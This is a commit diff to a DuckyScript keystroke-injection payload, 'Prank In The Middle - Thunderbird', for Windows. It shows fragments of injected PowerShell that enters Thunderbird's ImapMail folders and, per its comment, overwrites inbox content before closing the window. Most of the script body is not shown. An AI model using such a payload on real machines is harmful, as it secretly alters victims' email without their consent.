[+] STRINGLN_POWERSHELL

pull/453/head
Aleff 2024-06-06 10:03:22 +02:00 committed by GitHub
parent fe2a080aae
commit 255713357b
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 8 additions and 8 deletions

View File

@ -1,11 +1,11 @@
REM #####################################################
REM # #
REM # #
REM # Title : Prank In The Middle - Thunderbird #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Prank #
REM # Target : Windows 10/11 #
REM # #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Prank #
REM # Target : Windows 10/11 #
REM # #
REM #####################################################
EXTENSION DETECT_READY
@ -81,7 +81,7 @@ ENTER
DELAY 500
REM Get the INBOX content and edit it overwriting. Then close the powershell
STRINGLN
STRINGLN_POWERSHELL
cd ImapMail
$directories = Get-ChildItem -Directory | Select-Object FullName
foreach ($dir in $directories) {
@ -107,4 +107,4 @@ STRINGLN
}
END_STRINGLN
DELAY 1000
ALT F4
ALT F4